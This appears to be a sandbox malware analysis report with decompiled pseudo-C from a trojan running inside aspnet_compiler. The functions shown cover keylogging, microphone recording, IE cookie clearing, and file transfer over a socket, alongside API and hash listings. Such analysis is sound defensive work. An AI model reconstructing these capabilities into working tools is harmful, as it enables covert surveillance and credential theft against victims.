                    				long _v0;
                    				char _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				void* __ebx;
                    				void* __ebp;
                    				WCHAR* _t35;
                    				long _t42;
                    				struct _OVERLAPPED* _t54;
                    				intOrPtr _t72;
                    				intOrPtr _t74;
                    				long _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t80;
                    				void* _t82;
                    				void* _t83;
                    				void* _t85;
                    
                    				_t82 = __eflags;
                    				E00455FB0();
                    				_push(_t77);
                    				_t74 = __ecx;
                    				_t69 =  &_a100080;
                    				asm("xorps xmm0, xmm0");
                    				_a8 = __ecx;
                    				_t54 = 0;
                    				asm("movlpd [esp+0x10], xmm0");
                    				_a12 = 0;
                    				E00403242(0,  &_a16, _t77, _t82, E004087F0( &_a40,  &_a100080, _t77, L".part"));
                    				E00401EE9();
                    				_t78 = CreateFileW(E00401EE4( &_a12), 4, 0, 0, 2, 0x80, 0);
                    				_t83 = _v0 - _a100072;
                    				if(_t83 > 0) {
                    					L6:
                    					CloseHandle(_t78);
                    					_t35 = E00401EE4( &_a100080);
                    					MoveFileW(E00401EE4( &_a16), _t35);
                    					_t54 = 1;
                    				} else {
                    					_t72 = _a100072;
                    					if(_t83 >= 0) {
                    						L5:
                    						if(_v0 < _t72) {
                    							goto L2;
                    						} else {
                    							goto L6;
                    						}
                    					} else {
                    						while(1) {
                    							L2:
                    							_t42 = E00404B76(_t74,  &_a64, 0x186a0);
                    							_t76 = _t42;
                    							asm("cdq");
                    							_v12 = _v12 + _t42;
                    							asm("adc [esp+0x18], edx");
                    							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
                    							_t80 = _t80 - 0x18;
                    							E00402097(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
                    							E00404A81(_v12, _t69, _t83, 0x57, _v12);
                    							if(_t76 <= 0) {
                    								break;
                    							}
                    							_t74 = _v16;
                    							_t85 = _v20 - _a100052;
                    							if(_t85 < 0) {
                    								continue;
                    							} else {
                    								if(_t85 > 0) {
                    									goto L6;
                    								} else {
                    									goto L5;
                    								}
                    							}
                    							goto L7;
                    						}
                    						CloseHandle(_t78);
                    						DeleteFileW(E00401EE4( &_v8));
                    					}
                    				}
                    				L7:
                    				E00401EE9();
                    				E00401EE9();
                    				return _t54;
                    			}

                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00472EC8,00463F74,?,00000000,00407670,00000000), ref: 00407039
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 00407081
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • CloseHandle.KERNEL32(00000000,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 004070C1
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004070DE
                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407109
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407119
                      • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00472EE0,00404C29,00000000,?,?,?,00472EE0,?), ref: 00404B85
                      • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    • API String ID: 1303771098-3499674018
                    • Opcode ID: 05df109e2b3601ffd37186bfbcbdfdb56a4cb75ed44805870253dedc4343bf7e
                    • Instruction ID: e251a7d4a1aabd80805b5d7196bb96980f3888c3ff40e4c14fed717d8046ce17
                    • Opcode Fuzzy Hash: 05df109e2b3601ffd37186bfbcbdfdb56a4cb75ed44805870253dedc4343bf7e
                    • Instruction Fuzzy Hash: FE318571508301AFC210EB61DC859AFB7ECEB94355F40493FF945A21D2DB78EA488B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0040B463(void* __eflags) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v340;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t17;
                    				void* _t20;
                    				int _t34;
                    				void* _t40;
                    				void* _t41;
                    				char* _t42;
                    				void* _t48;
                    				void* _t60;
                    				void* _t62;
                    				void* _t63;
                    				void* _t64;
                    
                    				_t42 =  &_v28;
                    				E004020BF(_t40, _t42);
                    				_push(_t42);
                    				_t41 = 0;
                    				_t17 = E0041288E( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                    				_t64 = _t63 + 0xc;
                    				E00401FC2( &_v28, 0x80000001, _t60, _t17);
                    				E00401FB8();
                    				_t59 = 0x464074;
                    				_t20 = E00405AE5(0x464074);
                    				_t68 = _t20;
                    				if(_t20 == 0) {
                    					ExpandEnvironmentStringsA(E00401F8B( &_v28),  &_v340, 0x104);
                    					__eflags = PathFileExistsA( &_v340);
                    					if(__eflags == 0) {
                    						goto L1;
                    					} else {
                    						E00402073(0,  &_v52, 0x464074, _t62,  &_v340);
                    						_t59 =  &_v52;
                    						_t34 = E0041AC0A(E00401EE4(E0041A7B9( &_v76,  &_v52)),  &_v52);
                    						E00401EE9();
                    						E00401FB8();
                    						__eflags = _t34;
                    						if(__eflags == 0) {
                    							__eflags = E00406155(0x473950, "XP", 0);
                    							if(__eflags != 0) {
                    								_t41 = 1;
                    								E00402073(1, _t64 - 0x18,  &_v52, _t62, "\n[IE cookies cleared!]");
                    								E0040B752(1,  &_v52, _t62, __eflags);
                    								goto L8;
                    							}
                    						} else {
                    							_t48 = _t64 - 0x18;
                    							_push("\n[IE cookies cleared!]");
                    							goto L2;
                    						}
                    					}
                    				} else {
                    					L1:
                    					_t48 = _t64 - 0x18;
                    					_push("\n[IE cookies not found]");
                    					L2:
                    					E00402073(_t41, _t48, _t59, _t62);
                    					E0040B752(_t41, _t59, _t62, _t68);
                    					_t41 = 1;
                    					L8:
                    				}
                    				E00401FB8();
                    				return _t41;
                    			}


                    APIs
                      • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                      • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                      • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B4E5
                    • PathFileExistsA.SHLWAPI(?), ref: 0040B4F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P9G$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    • API String ID: 1133728706-1387963244
                    • Opcode ID: b1c7d62a7e2ac61be5ff86610abc16fbec87eceec088e68235dbd549a9611b7b
                    • Instruction ID: ea656425d40d7a45f5e056d43768dd8003def9e5f0b6d0ab8c53a167709f9c7c
                    • Opcode Fuzzy Hash: b1c7d62a7e2ac61be5ff86610abc16fbec87eceec088e68235dbd549a9611b7b
                    • Instruction Fuzzy Hash: DB214F31A402096ACB04F7E1DD96EEE77689E51708F40017FB901772C2EB7C9A45C6DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00401BC9(void* __eflags) {
                    				signed short _t3;
                    				signed int _t7;
                    				signed int _t15;
                    				signed int _t24;
                    				signed int _t25;
                    				void* _t33;
                    				intOrPtr* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				CreateDirectoryW(E00401EE4(0x472d40), 0);
                    				_t3 = 8;
                    				 *0x470ab6 = _t3;
                    				 *0x470aac = 0x1f40;
                    				 *0x470ab0 = 0x1f40;
                    				0x470aa8->wFormatTag = 1;
                    				 *0x470aaa = 1;
                    				 *0x470ab4 = 1;
                    				 *0x470ab8 = 0;
                    				_t7 = E0043A3AC(_t5, E00401F8B(E00401E45(0x473298, 1, _t33, _t35, 0x24)));
                    				_t24 =  *0x470aac; // 0x0
                    				 *_t34 = 0x30008;
                    				_t25 = _t24 * _t7 * 0x3c;
                    				 *0x470abc = _t25;
                    				 *0x470ac4 = (( *0x470ab6 & 0x0000ffff) >> 3) * _t25;
                    				waveInOpen(0x470ac0, 0xffffffff, 0x470aa8, E00401CEB, 0, ??);
                    				E00401F7D( *0x470ac4);
                    				0x470a88->lpData = E00401F8B(0x472d58);
                    				_t15 =  *0x470ac4; // 0x0
                    				 *0x470a8c = _t15;
                    				 *0x470a90 = 0;
                    				 *0x470a94 = 0;
                    				 *0x470a98 = 0;
                    				 *0x470a9c = 0;
                    				waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
                    				waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
                    				waveInStart( *0x470ac0);
                    				return 0;
                    			}


                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                    • waveInOpen.WINMM(00470AC0,000000FF,00470AA8,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                    • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401CC3
                    • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401CD2
                    • waveInStart.WINMM ref: 00401CDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: @-G$X-G
                    • API String ID: 1356121797-233566475
                    • Opcode ID: b0ca4a2526d5f22ff98bca90ea7e13aed92d536af1f6e02292cbd3d0dc651b83
                    • Instruction ID: d9f75f8a904554b1551795dc4e374556cb90ebe8a53537c147534bfad38ff794
                    • Opcode Fuzzy Hash: b0ca4a2526d5f22ff98bca90ea7e13aed92d536af1f6e02292cbd3d0dc651b83
                    • Instruction Fuzzy Hash: 5C213771616300DBC754AFAAFC09A6A7BA9EBB5315F00843EB10DD76F1DBB844818B5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004098BB(struct HHOOK__** __ecx) {
                    				struct tagMSG _v32;
                    				char _v60;
                    				void* _v64;
                    				void* __edi;
                    				void* __ebp;
                    				int _t7;
                    				void* _t8;
                    				struct HHOOK__* _t14;
                    				void* _t16;
                    				void* _t22;
                    				struct HHOOK__** _t34;
                    				void* _t36;
                    				signed int _t37;
                    				void* _t39;
                    
                    				_t39 = (_t37 & 0xfffffff8) - 0x38;
                    				_t34 = __ecx;
                    				 *0x470b24 = __ecx;
                    				if( *((intOrPtr*)(__ecx)) != 0) {
                    					goto L3;
                    				} else {
                    					_t14 = SetWindowsHookExA(0xd, E004098A7, GetModuleHandleA(0), 0);
                    					 *_t34 = _t14;
                    					_t44 = _t14;
                    					if(_t14 != 0) {
                    						while(1) {
                    							L3:
                    							_t7 = GetMessageA( &_v32, 0, 0, 0);
                    							__eflags = _t7;
                    							if(_t7 == 0) {
                    								break;
                    							}
                    							TranslateMessage( &_v32);
                    							DispatchMessageA( &_v32);
                    							__eflags =  *_t34;
                    							if( *_t34 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t8 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t16 = E0041A6E9(_t22,  &_v60, GetLastError());
                    						_t40 = _t39 - 0x18;
                    						E004052DD(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
                    						E00402073(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
                    						E0041A04A(_t22, 0);
                    						E00401FB8();
                    						_t8 = 1;
                    					}
                    				}
                    				return _t8;
                    			}


                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004098D6
                    • SetWindowsHookExA.USER32 ref: 004098E4
                    • GetLastError.KERNEL32 ref: 004098F0
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetMessageA.USER32 ref: 0040993E
                    • TranslateMessage.USER32(?), ref: 0040994D
                    • DispatchMessageA.USER32 ref: 00409958
                    Strings
                    • Keylogger initialization failure: error , xrefs: 00409904
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                    • Instruction ID: c40f6cef292aa3bb57f49984c9f8b97dc6da6adf0f265d4e9e2bb6cec8c4e7f3
                    • Opcode Fuzzy Hash: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                    • Instruction Fuzzy Hash: E81154726053016BC7107B76EC0A86B77ECDB95715F10467EF891E22A2EB38D940C76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E004494C9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				int _v12;
                    				void* _v24;
                    				signed int _t49;
                    				signed int _t54;
                    				int _t58;
                    				signed int _t60;
                    				short* _t62;
                    				signed int _t66;
                    				short* _t70;
                    				int _t71;
                    				int _t78;
                    				short* _t81;
                    				signed int _t87;
                    				signed int _t90;
                    				void* _t95;
                    				void* _t96;
                    				int _t98;
                    				short* _t101;
                    				int _t103;
                    				signed int _t106;
                    				short* _t107;
                    				void* _t110;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t49 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t49 ^ _t106;
                    				_push(__esi);
                    				_t103 = _a20;
                    				if(_t103 > 0) {
                    					_t78 = E00444FE6(_a16, _t103);
                    					_t110 = _t78 - _t103;
                    					_t4 = _t78 + 1; // 0x1
                    					_t103 = _t4;
                    					if(_t110 >= 0) {
                    						_t103 = _t78;
                    					}
                    				}
                    				_t98 = _a32;
                    				if(_t98 == 0) {
                    					_t98 =  *( *_a4 + 8);
                    					_a32 = _t98;
                    				}
                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                    				_v12 = _t54;
                    				if(_t54 == 0) {
                    					L38:
                    					return E004338BB(_v8 ^ _t106);
                    				} else {
                    					_t95 = _t54 + _t54;
                    					_t85 = _t95 + 8;
                    					asm("sbb eax, eax");
                    					if((_t95 + 0x00000008 & _t54) == 0) {
                    						_t81 = 0;
                    						__eflags = 0;
                    						L14:
                    						if(_t81 == 0) {
                    							L36:
                    							_t105 = 0;
                    							L37:
                    							E00434713(_t81);
                    							goto L38;
                    						}
                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                    						_t121 = _t58;
                    						if(_t58 == 0) {
                    							goto L36;
                    						}
                    						_t100 = _v12;
                    						_t60 = E00447433(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                    						_t105 = _t60;
                    						if(_t105 == 0) {
                    							goto L36;
                    						}
                    						if((_a12 & 0x00000400) == 0) {
                    							_t96 = _t105 + _t105;
                    							_t87 = _t96 + 8;
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							__eflags = _t87 & _t60;
                    							if((_t87 & _t60) == 0) {
                    								_t101 = 0;
                    								__eflags = 0;
                    								L30:
                    								__eflags = _t101;
                    								if(__eflags == 0) {
                    									L35:
                    									E00434713(_t101);
                    									goto L36;
                    								}
                    								_t62 = E00447433(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                    								__eflags = _t62;
                    								if(_t62 == 0) {
                    									goto L35;
                    								}
                    								_push(0);
                    								_push(0);
                    								__eflags = _a28;
                    								if(_a28 != 0) {
                    									_push(_a28);
                    									_push(_a24);
                    								} else {
                    									_push(0);
                    									_push(0);
                    								}
                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                    								__eflags = _t105;
                    								if(_t105 != 0) {
                    									E00434713(_t101);
                    									goto L37;
                    								} else {
                    									goto L35;
                    								}
                    							}
                    							_t90 = _t96 + 8;
                    							__eflags = _t96 - _t90;
                    							asm("sbb eax, eax");
                    							_t66 = _t60 & _t90;
                    							_t87 = _t96 + 8;
                    							__eflags = _t66 - 0x400;
                    							if(_t66 > 0x400) {
                    								__eflags = _t96 - _t87;
                    								asm("sbb eax, eax");
                    								_t101 = E00444A38(_t87, _t66 & _t87);
                    								_pop(_t87);
                    								__eflags = _t101;
                    								if(_t101 == 0) {
                    									goto L35;
                    								}
                    								 *_t101 = 0xdddd;
                    								L28:
                    								_t101 =  &(_t101[4]);
                    								goto L30;
                    							}
                    							__eflags = _t96 - _t87;
                    							asm("sbb eax, eax");
                    							E00455A90();
                    							_t101 = _t107;
                    							__eflags = _t101;
                    							if(_t101 == 0) {
                    								goto L35;
                    							}
                    							 *_t101 = 0xcccc;
                    							goto L28;
                    						}
                    						_t70 = _a28;
                    						if(_t70 == 0) {
                    							goto L37;
                    						}
                    						_t125 = _t105 - _t70;
                    						if(_t105 > _t70) {
                    							goto L36;
                    						}
                    						_t71 = E00447433(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                    						_t105 = _t71;
                    						if(_t71 != 0) {
                    							goto L37;
                    						}
                    						goto L36;
                    					}
                    					asm("sbb eax, eax");
                    					_t72 = _t54 & _t95 + 0x00000008;
                    					_t85 = _t95 + 8;
                    					if((_t54 & _t95 + 0x00000008) > 0x400) {
                    						__eflags = _t95 - _t85;
                    						asm("sbb eax, eax");
                    						_t81 = E00444A38(_t85, _t72 & _t85);
                    						_pop(_t85);
                    						__eflags = _t81;
                    						if(__eflags == 0) {
                    							goto L36;
                    						}
                    						 *_t81 = 0xdddd;
                    						L12:
                    						_t81 =  &(_t81[4]);
                    						goto L14;
                    					}
                    					asm("sbb eax, eax");
                    					E00455A90();
                    					_t81 = _t107;
                    					if(_t81 == 0) {
                    						goto L36;
                    					}
                    					 *_t81 = 0xcccc;
                    					goto L12;
                    				}
                    			}


                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 00449523
                    • __alloca_probe_16.LIBCMT ref: 0044955B
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 004495A9
                    • __alloca_probe_16.LIBCMT ref: 00449640
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004496A3
                    • __freea.LIBCMT ref: 004496B0
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • __freea.LIBCMT ref: 004496B9
                    • __freea.LIBCMT ref: 004496DE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 3864826663-0
                    • Opcode ID: c26f59f17cb63017309268d6e2a54a5d3af622c0da74579a986ce8ca93dbc3e9
                    • Instruction ID: 16b5e23e06f44e8f5b9cde4bfd472c7b38c402739d6472c7ebbca8c933d1a93d
                    • Opcode Fuzzy Hash: c26f59f17cb63017309268d6e2a54a5d3af622c0da74579a986ce8ca93dbc3e9
                    • Instruction Fuzzy Hash: C7510572A00216AFFB259F65CC81EBF77A9EB44750F16462EFC05D7240EB38DC50A698
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00418527
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418548
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418568
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041857C
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418592
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185AF
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185CA
                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004185E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                    • Instruction ID: 0947e47258becacd92e061a94fe1ad349a6366cffbcd8e1d8fee47d4855f6fd4
                    • Opcode Fuzzy Hash: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                    • Instruction Fuzzy Hash: 9C318131558309BEE311CF51DD41BEBBBDCEF98B54F00080FF6808A191D6A695C98BA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E00445DF1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                    				signed int _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v22;
                    				char _v24;
                    				signed int _v28;
                    				signed int* _v32;
                    				signed int _v33;
                    				signed int** _v40;
                    				intOrPtr _v44;
                    				intOrPtr* _v48;
                    				char _v52;
                    				void* _v64;
                    				signed int _t86;
                    				intOrPtr _t91;
                    				signed int _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				void* _t97;
                    				signed int _t98;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t104;
                    				intOrPtr _t105;
                    				signed int _t110;
                    				void* _t111;
                    				signed int _t116;
                    				signed int _t117;
                    				signed int _t129;
                    				void* _t133;
                    				signed int _t135;
                    				intOrPtr _t143;
                    				signed short* _t144;
                    				intOrPtr _t145;
                    				signed int** _t146;
                    				signed int _t147;
                    				signed int* _t148;
                    				signed int _t149;
                    				signed int _t152;
                    				signed short** _t154;
                    				signed int _t155;
                    				signed int _t159;
                    				signed int _t163;
                    				intOrPtr* _t171;
                    				signed short _t172;
                    				signed short* _t173;
                    				signed int** _t174;
                    				void* _t175;
                    				void* _t177;
                    				signed short* _t179;
                    				intOrPtr* _t180;
                    				intOrPtr* _t181;
                    				signed int* _t183;
                    				signed int _t184;
                    				signed int** _t185;
                    				signed int _t186;
                    				signed int _t187;
                    				signed int _t188;
                    
                    				_t149 = __ecx;
                    				_t86 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t86 ^ _t187;
                    				_t171 = _a12;
                    				_v52 = _a4;
                    				_t143 = _a24;
                    				_v40 = _a16;
                    				_v48 = _t171;
                    				_v44 = _t143;
                    				_t183 = _a20;
                    				_v32 = _t183;
                    				_t91 = _a8;
                    				if(_t91 == 0) {
                    					_t179 =  *(_t143 + 0x154);
                    				} else {
                    					if(_t91 == 1) {
                    						_t179 =  *(_t143 + 0x158);
                    					} else {
                    						_t179 =  *(_t143 + 0x15c);
                    					}
                    				}
                    				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                    					goto L113;
                    				} else {
                    					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                    					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                    					_v33 = _t163;
                    					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                    					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                    					_v16 =  *((intOrPtr*)(_t171 + 8));
                    					_v14 =  *((intOrPtr*)(_t171 + 4));
                    					_v12 =  *_t171;
                    					_v10 = 0;
                    					_t194 = _t163;
                    					if(_t163 == 0) {
                    						__eflags = 0;
                    						_t129 = E004470EB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                    					} else {
                    						_t129 = E0044722D(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
                    					}
                    					_t147 = _t129;
                    					if(_t147 == 0) {
                    						goto L113;
                    					} else {
                    						_t175 = _t147 + _t147;
                    						_t165 = _t175 + 8;
                    						asm("sbb eax, eax");
                    						if((_t175 + 0x00000008 & _t129) == 0) {
                    							_t184 = 0;
                    							__eflags = 0;
                    							L18:
                    							_v28 = _t184;
                    							if(_t184 == 0) {
                    								L30:
                    								E00434713(0);
                    								_t183 = _v32;
                    								while(1) {
                    									L113:
                    									_t172 =  *_t179 & 0x0000ffff;
                    									__eflags = _t172;
                    									if(_t172 == 0) {
                    										break;
                    									}
                    									__eflags =  *_t183;
                    									if( *_t183 == 0) {
                    										L28:
                    										L29:
                    										return E004338BB(_v8 ^ _t187);
                    									}
                    									_v32 = 0;
                    									_t152 = 0;
                    									__eflags = 0;
                    									_v28 = _t179;
                    									_t144 = _t179;
                    									_t94 = _t172 & 0x0000ffff;
                    									do {
                    										_t144 =  &(_t144[1]);
                    										_t152 = _t152 + 1;
                    										__eflags =  *_t144 - _t94;
                    									} while ( *_t144 == _t94);
                    									_t95 = _t172 & 0x0000ffff;
                    									_v28 = _t144;
                    									_t145 = _v44;
                    									__eflags = _t95 - 0x64;
                    									if(__eflags > 0) {
                    										_t96 = _t95 - 0x68;
                    										__eflags = _t96;
                    										if(_t96 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L110:
                    												_push(0x49);
                    												L111:
                    												_pop(_t97);
                    												_t84 =  &_v52; // 0x446368
                    												_t98 = E004451BB(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
                    												_t188 = _t188 + 0x1c;
                    												__eflags = _t98;
                    												if(_t98 == 0) {
                    													 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    													goto L29;
                    												}
                    												L112:
                    												_t179 = _v28;
                    												continue;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L110;
                    											}
                    											L108:
                    											_t154 = _v40;
                    											_t179 =  &(_t179[1]);
                    											 *( *_t154) = _t172;
                    											 *_t154 =  &(( *_t154)[1]);
                    											 *_t183 =  *_t183 - 1;
                    											continue;
                    										}
                    										_t102 = _t96 - 5;
                    										__eflags = _t102;
                    										if(_t102 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L105:
                    												_push(0x4d);
                    												goto L111;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L105;
                    											}
                    											goto L108;
                    										}
                    										_t103 = _t102 - 6;
                    										__eflags = _t103;
                    										if(_t103 == 0) {
                    											_t153 = _t152 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												_v32 = 1;
                    												L100:
                    												_push(0x53);
                    												goto L111;
                    											}
                    											_t153 = _t153 - 1;
                    											__eflags = _t153;
                    											if(_t153 == 0) {
                    												goto L100;
                    											}
                    											goto L108;
                    										}
                    										_t104 = _t103 - 1;
                    										__eflags = _t104;
                    										if(_t104 == 0) {
                    											_t105 = _v48;
                    											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
                    											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
                    												_t173 =  *(_t145 + 0x150);
                    											} else {
                    												_t173 =  *(_t145 + 0x14c);
                    											}
                    											__eflags = _t152 - 1;
                    											if(_t152 != 1) {
                    												L91:
                    												_t155 =  *_t173 & 0x0000ffff;
                    												__eflags = _t155;
                    												if(_t155 == 0) {
                    													goto L112;
                    												}
                    												_t146 = _v40;
                    												while(1) {
                    													__eflags =  *_t183;
                    													if( *_t183 <= 0) {
